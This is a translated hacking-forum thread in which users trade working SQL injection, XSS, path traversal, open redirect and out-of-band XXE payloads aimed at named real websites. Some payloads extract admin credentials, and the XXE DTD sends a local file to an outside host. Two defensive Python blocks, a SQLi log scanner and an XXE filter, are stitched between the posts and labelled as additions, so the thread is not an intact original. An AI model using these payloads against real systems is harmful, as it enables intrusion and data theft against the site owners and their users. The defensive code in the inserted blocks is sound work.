SQLi, XSS and other vulnerabilities.

Discussion in 'Sandbox' started by Егорыч+++, 10 May 2015.

  1. paponi

    paponi New Member

    Joined:
    30 May 2017
    Messages:
    12
    Likes Received:
    4
    Reputations:
    0
    This question has been on my mind for a long time, but I never got around to asking it. Is it possible to upload a shell instead of "load_file('/etc/passwd')"? I just don't understand yet why PHP gets executed in a SQL injection...
     
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    805
    Reputations:
    90
    Veil likes this.
  3. paponi

    paponi New Member

    Joined:
    30 May 2017
    Messages:
    12
    Likes Received:
    4
    Reputations:
    0
    Thanks. Live and learn.
     
    palec2006 and Grosser like this.
  4. Grosser

    Grosser New Member

    Joined:
    11 Oct 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    3
    I'm not very strong at coding, but those are the forum rules and I can only post here. Help me get to 5 reputation
     
  5. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    PHP:
    http://www.handelingsgerichtwerken.be/bestanden/download.php?id=69'+and+false+union select null,2,3,4,group_concat(0x202020,table_name,0x3c3e,column_name)+from information_schema.columns+where table_schema=database()+--+-
     
    Octavian and SooLFaa like this.
  6. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    447
    Likes Received:
    80
    Reputations:
    20
    Code:
    http://www.saifaiims.com/download.php?filename=../config/configuration.php
     
    ShpillyWilly likes this.
  7. The404

    The404 New Member

    Joined:
    9 Oct 2016
    Messages:
    6
    Likes Received:
    3
    Reputations:
    0
    Code:
     
    Печа and ShpillyWilly like this.
  8. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    PHP:
    http://www.bpc.gov.bd/contactus.php?id=4439'+/*!12345UNiOn*/%0ASeLEct+1,2,/*!50000user()*/,4,5,6,7+--+_
    ebfashion.com.bd/index.php?id=-8'+UnIoN+SeLEcT+1,user(),2+--+-
    http://www.vertexhome.co.il/pageE.php?id=110+UnIon+SeLEct+1,2,3,4,5,6,7,8,9,group_concat(table_name),11 from information_schema.tables where table_schema=database()+--+-
    http://foundation.sigmachi.org/station.php?id=wtg'+and+false+UnIon%0ASeLEct+1,user(),3,4,5,6+--+_
    http://www.commongroundnews.org/article.php?id=-32240'+/*!12345UnIoN%0ASeLEcT*/+1,2,user(),4,(/*!12345SELECT*/+/*!12345GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+/*!50000INFORMATION_SCHEMA.TABLES*/+WHERE+TABLE_SCHEMA=DATABASE()),6,7,8,9,10,11,12,131,4,15,15,15,15,15,16,16,22+--+-&lan=ba&sp=1
    http://oppodigital.in/product-details.php?id=9 and false UNiOn+SElEcT @,@,@,@,@,@,@,@,group_concat(table_name),@ from information_schema.tables #
    HTML:
    https://depositfiles.od.ua/tools/httpheaders.php
     
    #288 BabaDook, 2 Jan 2018
    Last edited: 6 Jan 2018
    panic.ker and grimnir like this.
  9. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    78
    Likes Received:
    3
    Reputations:
    0
    HTML:
    http://www.tnla.com/events.php?id=38+UNION+SELECT+1,concat(username,password)+from+tnlacom_tnla.admin_users+--+
     
  10. Mexel

    Mexel Member

    Joined:
    22 Nov 2016
    Messages:
    22
    Likes Received:
    10
    Reputations:
    3
    The ISP Электронный щит.
    Local XSS.
    Code:
    http://wwwcom.ru/connect.php/%22%3E%3Cscript%3Ealert('Tayler(Mexel)')%3C/script%3E
     
  11. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    222
    Likes Received:
    373
    Reputations:
    100
    target: http://www.premium-network.ru
    type: Time-based, Error-based
    user: forumpt@localhost1
    version: 5.5.371

    Time-based:
    Code:
    www.premium-network.ru/index.php?id=sktv_news&ns=70'+and+if(substring(version(),1,1)=5,SLEEP(15),1)--+


    Error-based:
    Code:
    http://www.premium-network.ru/index.php?id=sktv_news&ns=70%27%20union%20select%20count(*),concat(version(),floor(rand(0)*2))x,2,3%20from%20information_schema.tables%20group%20by%20x--+

     
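Added example, not from this thread or any of its posters: a defender-side access-log check that undoes the evasions used in the payloads above (plus/percent encoding, MySQL version comments, %0A line breaks, mixed case) and tags each request as time-based, error-based, UNION-based or schema enumeration. The log lines, IPs and host are constructed for the example; the query strings mirror the shapes posted in this thread.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (placeholder IPs, no real host) whose query strings
# mirror the payload shapes in this thread: plain request, time-based, error-based,
# version-comment obfuscated UNION, and percent-encoded UNION.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Feb/2018:10:00:00 +0000] "GET /index.php?id=sktv_news&ns=70 HTTP/1.1" 200 5120
10.0.0.7 - - [04/Feb/2018:10:00:01 +0000] "GET /index.php?id=sktv_news&ns=70'+and+if(substring(version(),1,1)=5,SLEEP(15),1)--+ HTTP/1.1" 200 5120
10.0.0.7 - - [04/Feb/2018:10:00:20 +0000] "GET /index.php?id=sktv_news&ns=70%27%20union%20select%20count(*),concat(version(),floor(rand(0)*2))x,2,3%20from%20information_schema.tables%20group%20by%20x--+ HTTP/1.1" 500 812
10.0.0.9 - - [04/Feb/2018:10:00:21 +0000] "GET /contactus.php?id=4439'+/*!12345UNiOn*/%0ASeLEct+1,2,/*!50000user()*/,4,5,6,7+--+_ HTTP/1.1" 200 3000
10.0.0.9 - - [04/Feb/2018:10:00:22 +0000] "GET /event/?id=1'+and+false+%55%6e%49%6f%4e+%2f%2a%21%31%32%33%34%35%53%65%4c%45%63%74%2a%2f+1,user(),3+--+- HTTP/1.1" 200 3000
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

# Signatures keyed by the injection style they indicate (MySQL-flavoured, as in the thread).
SIGNATURES = {
    "time-based": re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "error-based": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)"),
    "union-based": re.compile(r"\bunion\b\s+(?:all\s+)?select\b"),
    "schema-enum": re.compile(r"\binformation_schema\b"),
}

def normalize(query: str) -> str:
    """Undo the evasions seen above: plus/percent encoding (decoded twice to catch
    double-encoded input), MySQL version comments, newlines and letter case."""
    s = unquote_plus(unquote_plus(query))
    # /*!12345 UNION */ executes as UNION on MySQL, so keep the inner text
    s = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # ordinary comments carry nothing
    return re.sub(r"\s+", " ", s).lower()

def classify(query: str) -> list:
    """Names of the signatures that match a raw query string (empty list if clean)."""
    norm = normalize(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(norm)]

def scan_log(text: str) -> list:
    """(client_ip, path, tags) for every request whose query trips a signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        parts = urlsplit(target)
        tags = classify(parts.query)
        if tags:
            hits.append((ip, parts.path, tags))
    return hits
```

The same normalisation is the right first step for a WAF rule or SIEM parser, since matching on the raw, still-encoded query string is what the mixed-case and version-comment variants in this thread are designed to slip past.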
  12. xaphan

    xaphan Member

    Joined:
    29 Jan 2018
    Messages:
    6
    Likes Received:
    10
    Reputations:
    4
    OOB XXE
    Code:
    http://www.xmlforasp.net/SchemaValidator.aspx

    XML Payload:

    Code:
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE test SYSTEM "http://host/file.dtd">
    <data>&test;</data>

    .dtd File:
    Code:
    <!ENTITY % file SYSTEM "file:///Windows/system32/drivers/etc/services">
    <!ENTITY % all "<!ENTITY send SYSTEM '?%file;'>">
    %all;

     
    ms13, crlf, BigBear and 4 others like this.
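Added example, not from this thread or its posters: how an application that accepts XML should gate the OOB XXE request body shown above before any parser resolves it. The policy is to refuse every DOCTYPE (an upload or API endpoint rarely needs a DTD) and to record the SYSTEM/PUBLIC URIs as alert evidence; the attacker host is a placeholder, the inline variant of the payload is constructed, and Python's ElementTree stands in for whatever downstream parser the service uses.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: the OOB XXE body from the post above, with the attacker's
# DTD host replaced by a placeholder.
OOB_XXE = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test SYSTEM "http://attacker.example/file.dtd">
<data>&test;</data>"""

# Constructed sample: the same parameter-entity trick carried in the internal
# subset instead of a remotely fetched .dtd file.
INLINE_XXE = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM "file:///Windows/system32/drivers/etc/services">
  <!ENTITY % all "<!ENTITY send SYSTEM '?%file;'>">
  %all;
]>
<data>&send;</data>"""

BENIGN = '<?xml version="1.0"?><data><item id="1">ok</item></data>'

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# SYSTEM/PUBLIC external identifiers; a PUBLIC id is reduced to its first literal.
EXT_ID_RE = re.compile(r"\b(?:SYSTEM|PUBLIC)\s+([\"'])(.*?)\1", re.IGNORECASE)

class DTDNotAllowed(ValueError):
    pass

def prolog(xml_text: str) -> str:
    """Text before the first element start tag: XML declaration, DOCTYPE and its
    internal subset (which may itself contain <!ENTITY ...> markup)."""
    m = re.search(r"<(?![?!])", xml_text)
    return xml_text[:m.start()] if m else xml_text

def external_refs(xml_text: str) -> list:
    """URIs the DTD would make a resolving parser fetch; keep them as alert evidence."""
    return [uri for _quote, uri in EXT_ID_RE.findall(prolog(xml_text))]

def safe_parse(xml_text: str) -> ET.Element:
    """Reject any DOCTYPE before a parser touches the bytes, rather than trying to
    sanitise the DTD; only then hand the document to the real parser."""
    if DOCTYPE_RE.search(prolog(xml_text)):
        raise DTDNotAllowed(f"DTD rejected; external refs: {external_refs(xml_text)}")
    return ET.fromstring(xml_text)

def is_rejected(xml_text: str) -> bool:
    try:
        safe_parse(xml_text)
    except DTDNotAllowed:
        return True
    return False
```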
  13. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    A like for whoever tries to do it with output; I don't like blind ones, OOB is welcome. Preferably don't change the entry point.
     
  14. st55

    st55 Level 8

    Joined:
    20 Apr 2016
    Messages:
    174
    Likes Received:
    277
    Reputations:
    46
    Code:
    70('UNION ALL SELECT 1,2,version(),3-- a)---
    Output in the meta tag:
    Code:
    <META NAME="description" CONTENT="Последние новости, события и объявления для абонентов сети кабельного телевидения и Интернет Premium Net. 3 5.5.37">
     
    HeReTiC, crlf and BabaDook like this.
  15. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    376
    Likes Received:
    343
    Reputations:
    99
    Code:
    <META NAME="keywords" CONTENT="Новости Пушкино Красноармейск Premium Net 4 5.5.37">
    
    70'+union+select+1,version(),3,4--+
    It's all trivial here, why the parentheses?
     
    crlf and BabaDook like this.
  16. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    PHP:
    http://www.boxofficemojo.com/.htaccess
    view-source:http://www.boxofficemojo.com/maintenance.html
     
    panic.ker likes this.
  17. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    447
    Likes Received:
    80
    Reputations:
    20
    Sql Injection
    Code:
    http://www.ceadir-lunga.md/index.php?prm=999%27+UNION+ALL+SELECT+version()+--+&mid=201
    http://retrofilms.in/forum/feedcat.php?id=2%27+union+all+select+1,2,3,4,5,6,7,8,9+--+
    Hm, a rarity
    Code:
    http://katalogshop.md/tmp/
     
    #297 Octavian, 4 Feb 2018
    Last edited: 4 Feb 2018
  18. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    HTML:
    http://pravoslavsad4.ru/view_index21b.php?id=-1%27%20UnIon%20SeLEct%201%2C2%2C3%2C4%2C5%2C6%2C0x3c7363726970743e616c65727428646f63756d656e742e646f6d61696e293c2f7363726970743e%20--%20-
     
  19. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    What isn't working? P.S. Only just noticed it's you, аттак
    PHP:
    http://атаксупермаркет.рф/goods.aspx?id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES +WHERE+TABLE_NAME+NOT+IN+('yml_catalog','shop','email','currencies','currency','categories','category','offers','offer','categoryId','picture','orderingTime','onstock','ordering'))+--+
    The rest is up to you

    HTML:
    https://rdot.org/forum/showthread.php?t=826
     
    #299 BabaDook, 6 Mar 2018
    Last edited: 6 Mar 2018
    crlf likes this.
  20. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    HTML:
    https://www.mournhockey.com.ua/go.php?http://FFFFFFF.org
    http://iz.com.ua/engine/go.php?url=aHR0cDovL2dvb2dMZS5jb20=
    
    OpenRedirect

    HTML:
    https://bosa.in.ua/event/?id=1'+and+false+%55%6e%49%6f%4e+%2f%2a%21%31%32%33%34%35%53%65%4c%45%63%74%2a%2f+1,user(),3,4,5,6,7,8,9,database(),1,2,3,4,5,6,7,8,9,0,1,2,3,4,version(),6,7,8,9,0,1+--+-
     
    #300 BabaDook, 17 Mar 2018
    Last edited: 20 Mar 2018